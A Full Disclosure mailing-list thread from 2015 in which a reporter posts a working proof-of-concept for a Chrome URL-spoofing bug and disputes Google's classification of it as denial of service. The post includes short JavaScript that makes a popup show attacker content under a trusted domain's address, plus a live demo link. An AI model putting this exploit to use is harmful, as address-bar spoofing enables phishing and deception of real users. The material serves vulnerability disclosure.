Tested on Google Chrome 43.0.2357.130 (64-bit) (Linux) and it works. I do not 
think it is some kind of DoS attack, it is clearly URL spoofing vulnerability. 
Perhaps, your report does not clarify the vulnerability precisely. 
Chrome Rewards – Application Security – Google

|   |
|   |   |   |   |   |
| Chrome Rewards – Application Security – GoogleChrome Reward Program Rules  |
|  |
| View on www.google.com | Preview by Yahoo |
|  |
|   |

 



     On Tuesday, June 30, 2015 8:24 PM, David Leo <david....@deusen.co.uk> 
wrote:
   

 Impact:
The "click to verify" thing is completely broken...
Anyone can be "BBB Accredited Business" etc.
You can make whitehouse.gov display "We love Islamic State" :-)

Note:
No user interaction on the fake page.

Code:
***** index.html
<script>
function next()
{
    w.location.replace('http://www.oracle.com/index.html?'+n);n++;
    setTimeout("next();",15);
    setTimeout("next();",25);
}
function f()
{
    w=window.open("content.html","_blank","width=500 height=500");
    
i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5);
}
</script>
<a href="#" onclick="f()">Go</a><br>
***** content.html
<b>This web page is NOT oracle.com</b>
<script>location="http://www.oracle.com/index.html";;</script>
***** It's online
http://www.deusen.co.uk/items/gwhere.6128645971389012/
(The page says "June/16/2015" - it works as we tested today)

Request For Comment:
We reported this to Google.
They reproduced, and say
It's DoS which doesn't matter.
We think it's very strange,
since the browser does not crash(not DoS),
and the threat is obvious.
What's your opinion?

Kind Regards,

PS
We love clever tricks.
We love this:
http://dieyu.org/



  

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Reply via email to